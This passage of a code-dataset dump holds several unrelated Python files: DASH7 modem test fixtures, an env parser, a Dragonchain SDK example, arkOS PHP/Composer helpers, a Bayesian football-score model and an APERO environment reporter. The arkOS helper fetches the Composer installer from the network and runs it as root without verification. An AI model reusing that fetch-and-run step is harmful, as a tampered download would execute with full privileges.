(the\n# \"License\"); you may not use this file except in compliance\n# with the License. You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing,\n# software distributed under the License is distributed on an\n# \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n# KIND, either express or implied. 
See the License for the\n# specific language governing permissions and limitations\n# under the License.\n#\n\nimport pytest\n\nfrom d7a.alp.command import Command\nfrom d7a.dll.access_profile import AccessProfile\nfrom d7a.dll.sub_profile import SubProfile\nfrom d7a.phy.channel_header import ChannelHeader, ChannelBand, ChannelCoding, ChannelClass\nfrom d7a.phy.subband import SubBand\nfrom d7a.system_files.access_profile import AccessProfileFile\nfrom d7a.system_files.dll_config import DllConfigFile\nfrom d7a.system_files.engineering_mode import EngineeringModeFile\nfrom d7a.types.ct import CT\nfrom modem.modem import Modem\nfrom datetime import datetime\nfrom time import sleep\n\n\ndef pytest_addoption(parser):\n parser.addoption(\"--serial-test-device\", dest=\"serial_test_device\", help=\"serial port for Test Device\", default=None)\n parser.addoption(\"--serial-dut\", dest=\"serial_dut\", help=\"serial port for Device Under Test\", default=None)\n parser.addoption(\"--loop\", dest=\"loop\", help=\"loop count\", default=1, type=int)\n\n@pytest.fixture(scope=\"session\")\ndef serial_test_device(request):\n dev = request.config.getoption(\"--serial-test-device\")\n if dev is None:\n raise Exception(\"A serial port for the test device is required\")\n\n return dev\n\n@pytest.fixture(scope=\"session\")\ndef serial_dut(request):\n dev = request.config.getoption(\"--serial-dut\")\n if dev is None:\n raise Exception(\"A serial port for the DUT is required\")\n\n return dev\n\n@pytest.fixture(scope=\"session\")\ndef loop_count(request):\n return request.config.getoption(\"--loop\")\n\n@pytest.fixture(scope=\"session\")\ndef test_device(serial_test_device):\n modem = Modem(serial_test_device, 115200, None)\n modem.connect()\n return modem\n\n@pytest.fixture(scope=\"session\")\ndef dut(serial_dut):\n modem = Modem(serial_dut, 115200, None)\n modem.connect()\n return modem\n\n@pytest.fixture(scope=\"session\")\ndef default_channel_header():\n return ChannelHeader(channel_band=ChannelBand.BAND_868,\n channel_coding=ChannelCoding.FEC_PN9,\n channel_class=ChannelClass.LO_RATE)\n\n@pytest.fixture(scope=\"session\")\ndef default_channel_index():\n return 32\n\n@pytest.fixture\ndef context():\n class Context(object):\n pass\n\n return Context()\n\n@pytest.fixture(autouse=True)\ndef reset_before_check_after(test_device, dut):\n reset_board(test_device)\n reset_board(dut)\n\n yield\n\n assert len(dut.get_rebooted_received()) == 0, \"dut device got rebooted\"\n assert len(test_device.get_rebooted_received()) == 0, \"test device got rebooted\"\n\ndef reset_board(modem):\n modem.clear_rebooted_received()\n file = EngineeringModeFile()\n resp = modem.execute_command(\n alp_command=Command.create_with_write_file_action(\n file_id=5,\n data=list(file)\n )\n )\n assert resp, \"Reset board failed!\"\n wait_for_rebooted_response(modem)\n modem.clear_rebooted_received()\n\n\ndef create_access_profile(channel_header, channel_index, enable_channel_scan, scan_automation_period=CT.compress(0)):\n # create a simple access profile, assuming only one subprofile and one subband for now. 
By setting enable_channel_scan we are listening continuously on\n # the channel_index\n if enable_channel_scan:\n subband_bitmap = 0x01\n else:\n subband_bitmap = 0\n\n return AccessProfile(\n channel_header=channel_header,\n sub_profiles=[SubProfile(subband_bitmap=subband_bitmap, scan_automation_period=scan_automation_period), SubProfile(), SubProfile(),\n SubProfile()],\n sub_bands=[SubBand(\n channel_index_start=channel_index,\n channel_index_end=channel_index,\n eirp=0,\n cca=86\n )] * 8\n )\n\n\ndef change_access_profile(modem, access_profile, specifier=0):\n resp = modem.execute_command(Command.create_with_write_file_action_system_file(\n file=AccessProfileFile(access_profile=access_profile, access_specifier=specifier)),\n timeout_seconds=200\n )\n assert resp, \"Setting Access Profile failed!\"\n\ndef set_active_access_class(modem, access_class):\n resp = modem.execute_command(Command.create_with_write_file_action_system_file(DllConfigFile(active_access_class=access_class, nf_ctrl=0x22)))\n assert resp, \"Setting active access class failed!\"\n\ndef wait_for_unsolicited_response(modem):\n start_time = datetime.now()\n timeout = False\n while len(modem.get_unsolicited_responses_received()) == 0 and not timeout:\n if (datetime.now() - start_time).total_seconds() >= 60:\n timeout = True\n else:\n sleep(0.05)\n\n if timeout:\n assert False, \"Timed out waiting for unsolicited response\"\n\ndef wait_for_rebooted_response(modem):\n start_time = datetime.now()\n timeout = False\n while len(modem.get_rebooted_received()) == 0 and not timeout:\n if (datetime.now() - start_time).total_seconds() >= 60:\n timeout = True\n else:\n sleep(0.05)\n\n if timeout:\n assert False, \"Timed out waiting for rebooted\"\n","sub_path":"conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":5740,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"501615273","text":"import os, re\nfrom fenx.tools import setup_log\nimport logging as _logging\nlogger = _logging.getLogger(__name__)\n\n\ndef parse_env(path):\n \"\"\"\n Parse env file\n Example\n KEY=value\n :param path:\n :return:\n \"\"\"\n data = {}\n try:\n lines = [x.strip() for x in open(path).readlines()]\n except Exception as e:\n logger.error('Error parse file: {}'.format(e))\n return {}\n for line in lines:\n line = line.split('#', 1)[0]\n if not line.strip():\n continue\n m = re.search(r\"(\\w+)\\s*=\\s*(.*)$\", line.strip())\n if m:\n key, value = m.groups()\n value = os.path.expandvars(value)\n value = re.sub(r\"\\$ENV_DIR+\", os.path.normpath(os.path.dirname(path)), value)\n data[key] = value\n return data\n\n\ndef expand_war(value):\n value = os.path.expandvars(value)\n\n return value","sub_path":"parsers.py","file_name":"parsers.py","file_ext":"py","file_size_in_byte":893,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"175684081","text":"import json\nimport dragonchain_sdk\n\nclient = dragonchain_sdk.Client(dragonchain_id='your_dc_id', auth_key_id='your_auth_id', auth_key='your_auth_key', endpoint='https://your_dc_id.api.dragonchain.com')\n\n\n# Posting NodeJs contract\nprint(json.dumps(client.create_smart_contract(\n transaction_type='contract_name',\n image='image_name',\n cmd='node',\n args=['index.js'],\n execution_order='parallel',\n # registry_credentials=''\n)))\n\n\n# Updating NodeJs contract\n# print(json.dumps(client.update_contract(\n# contract_id='',\n# image='your_contract_image_name',\n# cmd='node', \n# 
args=['index.js'],\n# execution_order='parallel',\n# auth=''\n# )))\n\n# To post smart contracts written in different languages,\n# change the cmd and args values.\n\n# -----------------------\n# Python commands:\n# cmd='python',\n# args=['-m', 'index'],\n\n# -----------------------\n# Posting Go contract:\n# cmd='./main',\n# args=[''],\n\n# ------------------------\n# Posting C/C++ contract:\n# cmd='./main'\n# args=['']\n\n# -----------------------\n# Posting C# contract:\n# cmd='dotnet',\n# args=['root.dll'],\n\n# ------------------------\n# Posting Shell contract:\n# cmd='sh',\n# args=['contract.sh'],\n\n# --------------------------------------------------------\n# Delete a Smart Contract\n# print(client.delete_contract(''))\n","sub_path":"example_main.py","file_name":"example_main.py","file_ext":"py","file_size_in_byte":1422,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"480018279","text":"import os\nimport re\nimport urllib2\n\nfrom distutils.spawn import find_executable\n\nfrom arkos.utilities import shell\n\n\ndef install_composer():\n # Installs Composer to the system.\n cwd = os.getcwd()\n os.chdir(\"/root\")\n os.environ[\"COMPOSER_HOME\"] = \"/root\"\n enable_mod(\"phar\")\n open_basedir(\"add\", \"/root\")\n installer = urllib2.urlopen(\"https://getcomposer.org/installer\").read()\n s = shell(\"php\", stdin=installer)\n os.chdir(cwd)\n if s[\"code\"] != 0:\n raise Exception(\"Composer download/config failed. Error: %s\"%str(s[\"stderr\"]))\n os.rename(\"/root/composer.phar\", \"/usr/local/bin/composer\")\n os.chmod(\"/usr/local/bin/composer\", 0o755) # octal mode (rwxr-xr-x)\n open_basedir(\"add\", \"/usr/local/bin\")\n\ndef verify_composer():\n if not find_executable(\"composer\"):\n install_composer()\n if not find_executable(\"composer\"):\n raise Exception(\"Composer was not installed successfully.\")\n\ndef composer_install(path):\n # Install a PHP application bundle via Composer.\n verify_composer()\n cwd = os.getcwd()\n os.chdir(path)\n shell(\"composer self-update\")\n s = shell(\"composer install\")\n os.chdir(cwd)\n if s[\"code\"] != 0:\n raise Exception(\"Composer failed to install this app's bundle. 
Error: %s\"%str(s[\"stderr\"]))\n\ndef change_setting(name, value, config_file=\"/etc/php/php.ini\"):\n # Change a key value in php.ini\n with open(config_file, \"r\") as f:\n lines = f.readlines()\n with open(config_file, \"w\") as f:\n matched = False\n for line in lines:\n if re.search(re.escape(name) + \"\\s*=\", line):\n line = name+\" = \"+value+\"\\n\"\n matched = True\n f.write(line)\n if not matched:\n f.write(name+\" = \"+value+\"\\n\")\n\ndef enable_mod(*args, **kwargs):\n # Enable a PHP extension in php.ini\n config_file = kwargs.get(\"config_file\", \"/etc/php/php.ini\")\n with open(config_file, \"r\") as f:\n lines = f.readlines()\n with open(config_file, \"w\") as f:\n for line in lines:\n for x in args:\n if \";extension=%s.so\"%x in line:\n line = \"extension=%s.so\\n\"%x\n if \";zend_extension=%s.so\"%x in line:\n line = \"zend_extension=%s.so\\n\"%x\n f.write(line)\n\ndef disable_mod(*mod):\n # Enable a PHP extension in php.ini\n with open(\"/etc/php/php.ini\", \"r\") as f:\n lines = f.readlines()\n with open(\"/etc/php/php.ini\", \"w\") as f:\n for line in lines:\n for x in mod:\n if \"extension=%s.so\"%x in line and not line.startswith(\";\"):\n line = \";extension=%s.so\\n\"%x\n f.write(line)\n\ndef open_basedir(op, path):\n # Add or remove a path to php.ini's open_basedir setting.\n oc = []\n with open(\"/etc/php/php.ini\", \"r\") as f:\n ic = f.readlines()\n if op == \"del\":\n for l in ic:\n if \"open_basedir = \" in l and path in l:\n l = l.replace(\":\"+path, \"\")\n l = l.replace(\":\"+path+\"/\", \"\")\n oc.append(l)\n else:\n oc.append(l)\n else:\n for l in ic:\n if \"open_basedir = \" in l and path not in l:\n l = l.rstrip(\"\\n\") + \":%s\\n\" % path\n if l.startswith(\";open_basedir\"):\n l = l.replace(\";open_basedir\", \"open_basedir\")\n oc.append(l)\n else:\n oc.append(l)\n with open(\"/etc/php/php.ini\", \"w\") as f:\n f.writelines(oc)\n\ndef upload_size(size):\n # Set PHP's max upload and post sizes.\n oc = []\n with open(\"/etc/php/php.ini\", \"r\") as f:\n ic = f.readlines()\n for l in ic:\n if \"upload_max_filesize = \" in l:\n l = \"upload_max_filesize = %sM\" % size\n elif \"post_max_size = \" in l:\n l = \"post_max_size = %sM\" % size\n oc.append(l)\n with open(\"/etc/php/php.ini\", \"w\") as f:\n f.writelines(oc)\n","sub_path":"arkos/languages/php.py","file_name":"php.py","file_ext":"py","file_size_in_byte":3949,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"71776311","text":"import pandas as pd\nimport numpy as np\nimport datetime\nimport pymc as pm\nimport pymc.sampling_jax\nimport aesara.tensor as tt\nimport aesara\nfrom WeibullCountModelFunctions.MLE import MLE\nfrom WeibullCountModelFunctions.WeibullPMF import weibullPmf\nfrom WeibullCountModelFunctions.frankCopula import copula\nfrom itertools import combinations\nfrom scipy.stats import norm\nfrom scipy.integrate import quad, dblquad\nfrom math import factorial, exp, sqrt, pi\n\ndef get_model_posteriors(trace, n_teams):\n tracedict = {\"home\":[],\"intercept\":[],\"offense\":[],\"defense\":[]}\n for i in range(n_teams):\n tracedict[\"offense\"].append([])\n tracedict[\"defense\"].append([])\n for key in tracedict:\n for a in trace.posterior[key]:\n if (key == \"offense\" or key == \"defense\"):\n for b in a.data:\n for i in range(len(b)):\n tracedict[key][i].append(b[i])\n else:\n tracedict[key].extend(a.data)\n\n posteriors = {}\n h_μ, h_σ = norm.fit(tracedict['home'])\n posteriors['home'] = [h_μ, h_σ]\n i_μ, i_σ = 
+{"seq_id":"71776311","text":"import numpy as np\nimport pymc as pm\nimport pymc.sampling_jax\nimport aesara.tensor as tt\nfrom scipy.stats import norm\nfrom scipy.integrate import quad\nfrom math import factorial, sqrt, pi\n\ndef get_model_posteriors(trace, n_teams):\n tracedict = {\"home\":[],\"intercept\":[],\"offense\":[],\"defense\":[]}\n for i in range(n_teams):\n tracedict[\"offense\"].append([])\n tracedict[\"defense\"].append([])\n for key in tracedict:\n for a in trace.posterior[key]:\n if (key == \"offense\" or key == \"defense\"):\n for b in a.data:\n for i in range(len(b)):\n tracedict[key][i].append(b[i])\n else:\n tracedict[key].extend(a.data)\n\n posteriors = {}\n h_μ, h_σ = norm.fit(tracedict['home'])\n posteriors['home'] = [h_μ, h_σ]\n i_μ, i_σ = norm.fit(tracedict['intercept'])\n posteriors['intercept'] = [i_μ, i_σ]\n o_μ = []\n o_σ = []\n d_μ = []\n d_σ = []\n for i in range(n_teams):\n oᵢ_μ, oᵢ_σ = norm.fit(tracedict['offense'][i])\n o_μ.append(oᵢ_μ)\n o_σ.append(oᵢ_σ)\n dᵢ_μ, dᵢ_σ = norm.fit(tracedict['defense'][i])\n d_μ.append(dᵢ_μ)\n d_σ.append(dᵢ_σ)\n posteriors['offense'] = [o_μ, o_σ]\n posteriors['defense'] = [d_μ, d_σ]\n\n return posteriors\n\ndef fatten_priors(prev_posteriors, factor, f_thresh):\n priors = prev_posteriors.copy()\n #priors['home'][1] = np.minimum(priors['home'][1] * factor, f_thresh)\n #priors['intercept'][1] = np.minimum(priors['intercept'][1] * factor, f_thresh)\n priors['offense'][1] = np.minimum(np.array(priors['offense'][1]) * factor, f_thresh)\n priors['defense'][1] = np.minimum(np.array(priors['defense'][1]) * factor, f_thresh)\n\n return priors\n\ndef model_iteration(idₕ, sₕ_obs, idₐ, sₐ_obs, priors, n_teams, Δσ, samples=2000, tune=1000, cores=3):\n with pm.Model():\n # Global model parameters\n h = pm.Normal('home', mu=priors['home'][0], sigma=priors['home'][1])\n i = pm.Normal('intercept', mu=priors['intercept'][0], sigma=priors['intercept'][1])\n\n # Team-specific poisson model parameters\n o_star_init = pm.Normal('o_star_init', mu=priors['offense'][0], sigma=priors['offense'][1], shape=n_teams)\n Δ_o = pm.Normal('Δ_o', mu=0.0, sigma=Δσ, shape=n_teams)\n o_star = pm.Deterministic('o_star', o_star_init + Δ_o)\n o = pm.Deterministic('offense', o_star - tt.mean(o_star))\n\n d_star_init = pm.Normal('d_star_init', mu=priors['defense'][0], sigma=priors['defense'][1], shape=n_teams)\n Δ_d = pm.Normal('Δ_d', mu=0.0, sigma=Δσ, shape=n_teams)\n d_star = pm.Deterministic('d_star', d_star_init + Δ_d)\n d = pm.Deterministic('defense', d_star - tt.mean(d_star))\n\n λₕ = tt.exp(i + h + o[idₕ] - d[idₐ])\n λₐ = tt.exp(i + o[idₐ] - d[idₕ])\n\n # Likelihood of observed data\n sₕ = pm.Poisson('sₕ', mu=λₕ, observed=sₕ_obs)\n sₐ = pm.Poisson('sₐ', mu=λₐ, observed=sₐ_obs)\n\n trace = pm.sampling_jax.sample_numpyro_nuts(\n samples,\n tune=tune,\n chains=3\n )\n\n posteriors = get_model_posteriors(trace, n_teams)\n\n return posteriors\n\ndef model_iteration_xg(idₕ, sₕ_obs, idₐ, sₐ_obs, priors, n_teams, Δσ, samples=2000, tune=1000, cores=3):\n with pm.Model():\n # Global model parameters\n h = pm.Normal('home', mu=priors['home'][0], sigma=priors['home'][1])\n i = pm.Normal('intercept', mu=priors['intercept'][0], sigma=priors['intercept'][1])\n\n # Team-specific poisson model parameters\n o_star_init = pm.Normal('o_star_init', mu=priors['offense'][0], sigma=priors['offense'][1], shape=n_teams)\n Δ_o = pm.Normal('Δ_o', mu=0.0, sigma=Δσ, shape=n_teams)\n o_star = pm.Deterministic('o_star', o_star_init + Δ_o)\n o = pm.Deterministic('offense', o_star - tt.mean(o_star))\n\n d_star_init = pm.Normal('d_star_init', mu=priors['defense'][0], sigma=priors['defense'][1], shape=n_teams)\n Δ_d = pm.Normal('Δ_d', mu=0.0, sigma=Δσ, shape=n_teams)\n d_star = pm.Deterministic('d_star', d_star_init + Δ_d)\n d = pm.Deterministic('defense', d_star - tt.mean(d_star))\n\n λₕ = tt.exp(i + h + o[idₕ] - d[idₐ])\n # NOTE: σₕ and σₐ are computed but not used below; the observation noise is fixed at sigma=2\n σₕ = sqrt(priors['home'][1]**2 + priors[\"intercept\"][1]**2 + 0.15)\n λₐ = tt.exp(i + o[idₐ] - d[idₕ])\n σₐ = sqrt(priors[\"intercept\"][1]**2 + 0.15)\n\n # Likelihood of observed data\n sₕ = pm.Normal('sₕ', mu=λₕ, sigma=2, observed=sₕ_obs)\n sₐ = pm.Normal('sₐ', mu=λₐ, sigma=2, observed=sₐ_obs)\n\n trace = pm.sampling_jax.sample_numpyro_nuts(\n samples,\n tune=tune,\n chains=3\n )\n\n posteriors = get_model_posteriors(trace, 
n_teams)\n\n return posteriors\n\ndef model_update(idₕ, sₕ_obs, idₐ, sₐ_obs, priors, n_teams, f, f_thresh, Δσ, xgUpdate = False):\n priors[\"offense\"][0] = np.array(priors[\"offense\"][0])\n priors[\"offense\"][1] = np.array(priors[\"offense\"][1])\n priors[\"defense\"][1] = np.array(priors[\"defense\"][1])\n priors[\"defense\"][0] = np.array(priors[\"defense\"][0])\n if (xgUpdate == True):\n posteriors = model_iteration_xg(idₕ, sₕ_obs, idₐ, sₐ_obs, priors, n_teams, Δσ)\n else:\n posteriors = model_iteration(idₕ, sₕ_obs, idₐ, sₐ_obs, priors, n_teams, Δσ)\n posteriors = fatten_priors(posteriors, f, f_thresh)\n\n return posteriors\n\ndef bayesian_poisson_pdf(μ, σ, max_y=10):\n def integrand(x, y, σ, μ):\n pois = (np.exp(x)**y)*np.exp(-np.exp(x))/factorial(y)\n norm = np.exp(-0.5*((x-μ)/σ)**2.0)/(σ * sqrt(2.0*pi))\n return pois * norm\n\n lwr = -3.0\n upr = 5.0\n\n y = np.arange(0,max_y)\n p = []\n for yi in y:\n I = quad(integrand, lwr, upr, args=(yi,σ,μ))\n p.append(I[0])\n p.append(1.0 - sum(p))\n\n return p\n\n\ndef single_game_prediction(row, posteriors, teams_to_int, decimals = 5):\n precision = f\".{decimals}f\"\n game_pred = {\"H_proj\":[],\"A_proj\":[],\"p_1\":[0],\"p_X\":[0],\"p_2\":[0],\"p_Open_home_cover\":[0],\"p_Close_home_cover\":[0],\"p_Open_over\":[0],\"p_Close_over\":[0]}\n idₕ = teams_to_int[row[\"Home\"]]\n idₐ = teams_to_int[row[\"Away\"]]\n i_μ = posteriors[\"intercept\"][0]\n i_σ = posteriors[\"intercept\"][1]\n h_μ = posteriors[\"home\"][0]\n h_σ = posteriors[\"home\"][1]\n oₕ_μ = posteriors[\"offense\"][0][idₕ]\n oₕ_σ = posteriors[\"offense\"][1][idₕ]\n oₐ_μ = posteriors[\"offense\"][0][idₐ]\n oₐ_σ = posteriors[\"offense\"][1][idₐ]\n dₕ_μ = posteriors[\"defense\"][0][idₕ]\n dₕ_σ = posteriors[\"defense\"][1][idₕ]\n dₐ_μ = posteriors[\"defense\"][0][idₐ]\n dₐ_σ = posteriors[\"defense\"][1][idₐ]\n # Normal(μ₁,σ₁²) + Normal(μ₂,σ₂²) = Normal(μ₁ + μ₂, σ₁² + σ₂²)\n log_λₕ_μ = i_μ + h_μ + oₕ_μ - dₐ_μ\n game_pred[\"H_proj\"].append(np.exp(log_λₕ_μ))\n log_λₕ_σ = np.sqrt(i_σ ** 2 + h_σ ** 2 + oₕ_σ ** 2 + dₐ_σ ** 2)\n log_λₐ_μ = i_μ + oₐ_μ - dₕ_μ\n game_pred[\"A_proj\"].append(np.exp(log_λₐ_μ))\n log_λₐ_σ = np.sqrt(i_σ ** 2 + oₐ_σ ** 2 + dₕ_σ ** 2)\n home_score_pdf = bayesian_poisson_pdf(log_λₕ_μ, log_λₕ_σ)\n away_score_pdf = bayesian_poisson_pdf(log_λₐ_μ, log_λₐ_σ)\n p_spaces = {\"Open_cover\":0,\"Close_cover\":0,\"Open_over\":0,\"Close_over\":0}\n for sₕ, pₕ in enumerate(home_score_pdf):\n for sₐ, pₐ in enumerate(away_score_pdf):\n p = pₕ * pₐ\n if sₕ > sₐ:\n game_pred[\"p_1\"][0] += p\n elif sₐ > sₕ:\n game_pred[\"p_2\"][0] += p\n else:\n game_pred[\"p_X\"][0] += p\n\n for x in [\"Open\",\"Close\"]:\n if (\".5\" in str(row[x + \" AH\"])):\n p_spaces[x + \"_cover\"] += p\n if (sₕ > sₐ + row[x + \" AH\"]):\n game_pred[\"p_\" + x + \"_home_cover\"][0] += p\n elif (\".75\" not in str(row[x + \" AH\"]) and \".25\" not in str(row[x + \" AH\"])):\n if (sₕ != sₐ + row[x + \" AH\"]):\n p_spaces[x + \"_cover\"] += p\n if (sₕ > sₐ + row[x + \" AH\"]):\n game_pred[\"p_\" + x + \"_home_cover\"][0] += p\n else:\n parts = [row[x + \" AH\"] - 0.25,row[x + \" AH\"] + 0.25]\n for part in parts:\n if (\".5\" in str(part)):\n p_spaces[x + \"_cover\"] += p\n if (sₕ > sₐ + part):\n game_pred[\"p_\" + x + \"_home_cover\"][0] += p\n else:\n if (sₕ != sₐ + part):\n p_spaces[x + \"_cover\"] += p\n if (sₕ > sₐ + part):\n game_pred[\"p_\" + x + \"_home_cover\"][0] += p\n\n if (\".5\" in str(row[x + \" OU\"])):\n p_spaces[x + \"_over\"] += p\n if (sₕ + sₐ > row[x + \" OU\"]):\n game_pred[\"p_\" + x + 
\"_over\"][0] += p\n elif (\".75\" not in str(row[x + \" OU\"]) and \".25\" not in str(row[x + \" OU\"])):\n if (sₕ + sₐ != row[x + \" OU\"]):\n p_spaces[x + \"_over\"] += p\n if (sₕ + sₐ > row[x + \" OU\"]):\n game_pred[\"p_\" + x + \"_over\"][0] += p\n else:\n parts = [row[x + \" OU\"] - 0.25,row[x + \" OU\"] + 0.25]\n for part in parts:\n if (\".5\" in str(part)):\n p_spaces[x + \"_over\"] += p\n if (sₕ + sₐ > part):\n game_pred[\"p_\" + x + \"_over\"][0] += p\n else:\n if (sₕ + sₐ != part):\n p_spaces[x + \"_over\"] += p\n if (sₕ + sₐ > part):\n game_pred[\"p_\" + x + \"_over\"][0] += p\n for x in [\"Open\",\"Close\"]:\n game_pred[\"p_\" + x + \"_home_cover\"][0] = game_pred[\"p_\" + x + \"_home_cover\"][0] / p_spaces[x + \"_cover\"]\n game_pred[\"p_\" + x + \"_over\"][0] = game_pred[\"p_\" + x + \"_over\"][0] / p_spaces[x + \"_over\"]\n return game_pred\n","sub_path":"bayesianModelFcns.py","file_name":"bayesianModelFcns.py","file_ext":"py","file_size_in_byte":10781,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"402853581","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\n# CODE NAME HERE\n\n# CODE DESCRIPTION HERE\n\nCreated on 2019-08-16 at 09:23\n\n@author: cook\n\"\"\"\nimport sys\nimport os\nimport platform\nimport psutil\nimport getpass\nimport socket\n\n# =============================================================================\n# Define functions\n# =============================================================================\ndef main():\n keys = dict()\n keys['MAJOR'] = sys.version_info.major\n keys['MINOR'] = sys.version_info.minor\n keys['MICRO'] = sys.version_info.micro\n # get python path\n if 'PYTHONPATH' in os.environ:\n pythonpath = os.environ['PYTHONPATH']\n keys['PYTHONPATH'] = '\\t\\t' + '\\n\\t\\t'.join(pythonpath.split(os.pathsep))\n else:\n keys['PYTHONPATH'] = 'None'\n # get path\n if 'PATH' in os.environ:\n path = os.environ['PATH']\n keys['PATH'] = '\\t\\t' + '\\n\\t\\t'.join(path.split(os.pathsep))\n else:\n keys['PATH'] = 'None'\n # get DRS_UCONFIG\n if 'DRS_UCONFIG' in os.environ:\n keys['DRS_UCONFIG'] = os.environ['DRS_UCONFIG']\n else:\n keys['DRS_UCONFIG'] = 'None'\n # get modules\n try:\n import astropy\n keys['ASTROPY'] = astropy.__version__\n except:\n keys['ASTROPY'] = 'NOT FOUND'\n try:\n import barycorrpy\n keys['BARYCORRPY'] = barycorrpy.__version__\n except:\n keys['BARYCORRPY'] = 'NOT FOUND'\n try:\n import bottleneck\n keys['BOTTLENECK'] = bottleneck.__version__\n except:\n keys['BOTTLENECK'] = 'NOT FOUND'\n try:\n import numpy\n keys['NUMPY'] = numpy.__version__\n except:\n keys['NUMPY'] = 'NOT FOUND'\n try:\n import numba\n keys['NUMBA'] = numba.__version__\n except:\n keys['NUMBA'] = 'NOT FOUND'\n try:\n import matplotlib\n keys['MATPLOTLIB'] = matplotlib.__version__\n except:\n keys['MATPLOTLIB'] = 'NOT FOUND'\n try:\n import scipy\n keys['SCIPY'] = scipy.__version__\n except:\n keys['SCIPY'] = 'NOT FOUND'\n # apero setup\n try:\n import apero\n from apero.core import drs_startup as drs\n from apero.core import constants\n instruments = drs.Constants['DRS_INSTRUMENTS']\n\n keys['APERO_VERSION'] = drs.__version__\n\n variables = ''\n variables += '\\nAPERO DATE: {0}'.format(drs.__date__)\n variables += '\\nAPERO PATH: {0}'.format(apero.__path__[0])\n variables += '\\n'\n variables += '\\nINSTALLED INSTRUMENTS: ' + ', '.join(instruments)\n\n for instrument in instruments:\n\n params = constants.load(instrument)\n # add variables\n variables += '\\n\\n' + '=' * 50\n 
+{"seq_id":"402853581","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\n# CODE NAME HERE\n\n# CODE DESCRIPTION HERE\n\nCreated on 2019-08-16 at 09:23\n\n@author: cook\n\"\"\"\nimport sys\nimport os\nimport platform\nimport psutil\nimport getpass\nimport socket\n\n# =============================================================================\n# Define functions\n# =============================================================================\ndef main():\n keys = dict()\n keys['MAJOR'] = sys.version_info.major\n keys['MINOR'] = sys.version_info.minor\n keys['MICRO'] = sys.version_info.micro\n # get python path\n if 'PYTHONPATH' in os.environ:\n pythonpath = os.environ['PYTHONPATH']\n keys['PYTHONPATH'] = '\\t\\t' + '\\n\\t\\t'.join(pythonpath.split(os.pathsep))\n else:\n keys['PYTHONPATH'] = 'None'\n # get path\n if 'PATH' in os.environ:\n path = os.environ['PATH']\n keys['PATH'] = '\\t\\t' + '\\n\\t\\t'.join(path.split(os.pathsep))\n else:\n keys['PATH'] = 'None'\n # get DRS_UCONFIG\n if 'DRS_UCONFIG' in os.environ:\n keys['DRS_UCONFIG'] = os.environ['DRS_UCONFIG']\n else:\n keys['DRS_UCONFIG'] = 'None'\n # get modules\n try:\n import astropy\n keys['ASTROPY'] = astropy.__version__\n except Exception:\n keys['ASTROPY'] = 'NOT FOUND'\n try:\n import barycorrpy\n keys['BARYCORRPY'] = barycorrpy.__version__\n except Exception:\n keys['BARYCORRPY'] = 'NOT FOUND'\n try:\n import bottleneck\n keys['BOTTLENECK'] = bottleneck.__version__\n except Exception:\n keys['BOTTLENECK'] = 'NOT FOUND'\n try:\n import numpy\n keys['NUMPY'] = numpy.__version__\n except Exception:\n keys['NUMPY'] = 'NOT FOUND'\n try:\n import numba\n keys['NUMBA'] = numba.__version__\n except Exception:\n keys['NUMBA'] = 'NOT FOUND'\n try:\n import matplotlib\n keys['MATPLOTLIB'] = matplotlib.__version__\n except Exception:\n keys['MATPLOTLIB'] = 'NOT FOUND'\n try:\n import scipy\n keys['SCIPY'] = scipy.__version__\n except Exception:\n keys['SCIPY'] = 'NOT FOUND'\n # apero setup\n try:\n import apero\n from apero.core import drs_startup as drs\n from apero.core import constants\n instruments = drs.Constants['DRS_INSTRUMENTS']\n\n keys['APERO_VERSION'] = drs.__version__\n\n variables = ''\n variables += '\\nAPERO DATE: {0}'.format(drs.__date__)\n variables += '\\nAPERO PATH: {0}'.format(apero.__path__[0])\n variables += '\\n'\n variables += '\\nINSTALLED INSTRUMENTS: ' + ', '.join(instruments)\n\n for instrument in instruments:\n\n params = constants.load(instrument)\n # add variables\n variables += '\\n\\n' + '=' * 50\n variables += '\\n\\t' + instrument\n variables += '\\n' + '=' * 50 + '\\n'\n variables += '\\nDRS_ROOT: ' + params['DRS_ROOT']\n variables += '\\nDRS_DATA_RAW: ' + params['DRS_DATA_RAW']\n variables += '\\nDRS_DATA_REDUC: ' + params['DRS_DATA_REDUC']\n variables += '\\nDRS_CALIB_DB: ' + params['DRS_CALIB_DB']\n variables += '\\nDRS_TELLU_DB: ' + params['DRS_TELLU_DB']\n variables += '\\nDRS_DATA_MSG: ' + params['DRS_DATA_MSG']\n variables += '\\nDRS_DATA_WORKING: ' + params['DRS_DATA_WORKING']\n variables += '\\nDRS_DATA_RUN: ' + params['DRS_DATA_RUN']\n\n keys['APERO_VARIABLES'] = variables\n\n except Exception:\n keys['APERO_VERSION'] = 'NOT FOUND'\n keys['APERO_VARIABLES'] = ''\n\n # computer information\n keys['COMPUTER_RELEASE'] = platform.release()\n keys['COMPUTER_ARCHITECTURE'] = platform.machine()\n keys['COMPUTER_VERSION'] = platform.version()\n keys['COMPUTER_SYSTEM'] = platform.system()\n keys['COMPUTER_PROCESSOR'] = platform.processor()\n totalmem = psutil.virtual_memory().total\n keys['COMPUTER_RAM'] = str(round(totalmem / (1024.0 ** 3))) + \" GB\"\n keys['USER'] = getpass.getuser()\n keys['HOST'] = socket.gethostname()\n keys['HOME'] = os.path.expanduser(\"~\")\n\n print_string = \"\"\"\n \n================================================================================\nAPERO\n================================================================================\n\nDRS_UCONFIG = {DRS_UCONFIG}\n\nAPERO: {APERO_VERSION}\n\n{APERO_VARIABLES}\n\n================================================================================\nPYTHON\n================================================================================\n\nPYTHON VERSION = {MAJOR}.{MINOR}.{MICRO}\n\nPYTHON PATH:\n{PYTHONPATH}\n\nASTROPY: {ASTROPY}\nBARYCORRPY: {BARYCORRPY}\nBOTTLENECK: 